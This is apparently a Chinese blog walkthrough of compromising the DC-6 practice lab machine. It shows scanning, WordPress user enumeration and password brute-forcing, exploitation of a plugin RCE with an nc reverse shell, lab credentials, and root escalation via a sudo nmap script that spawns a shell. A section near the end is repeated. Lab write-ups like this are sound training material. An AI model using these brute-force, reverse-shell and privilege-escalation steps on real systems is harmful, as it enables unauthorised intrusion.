靶机-DC6

arp-scan查靶机IP

在这里插入图片描述

masscan查端口

在这里插入图片描述

nmap深度扫描

在这里插入图片描述

端口:22,80

dirb目录扫描

在这里插入图片描述

访问主页,发现需要域名解析

在这里插入图片描述

指纹

在这里插入图片描述

http://192.168.253.136/wp-includes/里面是wp配置文件

在这里插入图片描述

http://192.168.253.136/wp-admin/css/

在这里插入图片描述

http://192.168.253.136/wp-admin/images/

在这里插入图片描述

http://192.168.253.136/wp-admin/includes/

在这里插入图片描述

http://192.168.253.136/wp-admin/maint/

在这里插入图片描述

指定url,枚举其中的用户名

wpscan --url wordy -e user.txt 将枚举出的用户名写到user.txt中

官方给了一个线索:cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt

wpscan --url http://wordy/ -e u #用户枚举

在这里插入图片描述

admin,graham,mark,sarah,jens

用户名和密码字典都有了,开始爆破
wpscan --url wordy -U user.txt -P pwd.txt

爆破出来账号:mark 密码:helpdesk01

在这里插入图片描述

发现存在RCE

在这里插入图片描述

nc反弹

在这里插入图片描述

在这里插入图片描述

在mark目录找到密码 user: graham - GSo7isUM1D4 - done

在这里插入图片描述

ssh登录

在这里插入图片描述

可以看到jens用户目录下面有一个可执行文件
切换到jens用户目录,查看backups.sh的内容

修改脚本,在末尾增加/bin/bash

使用jens用户运行脚本切换到jens用户

在这里插入图片描述

使用sudo -l查看jens用户可执行操作

jens用户可以在无需输入密码的情况下使用nmap(root权限)
直接上提权网站查询nmap sudo提权的方法

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

在这里插入图片描述

获得root权限,回到root路径下找到flag

在这里插入图片描述


发现存在一个插件Activity monitor,使用kali搜索这个插件是否存在漏洞

尝试45274.html这个漏洞利用文件

searchsploit -m 45274.html
vim 45274.html
#在箭头1修改为域名地址
#箭头2修改为kali反弹shell命令

#kali监听shell
nc -lnvp 4443
searchsploit -m 45274.html
vim 45274.html
#在箭头1修改为域名地址
#箭头2修改为kali反弹shell命令

#kali监听shell
nc -lnvp 4443

#反弹shell成功,转换交互式shell python -c ‘import pty;pty.spawn(“/bin/bash”)’

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值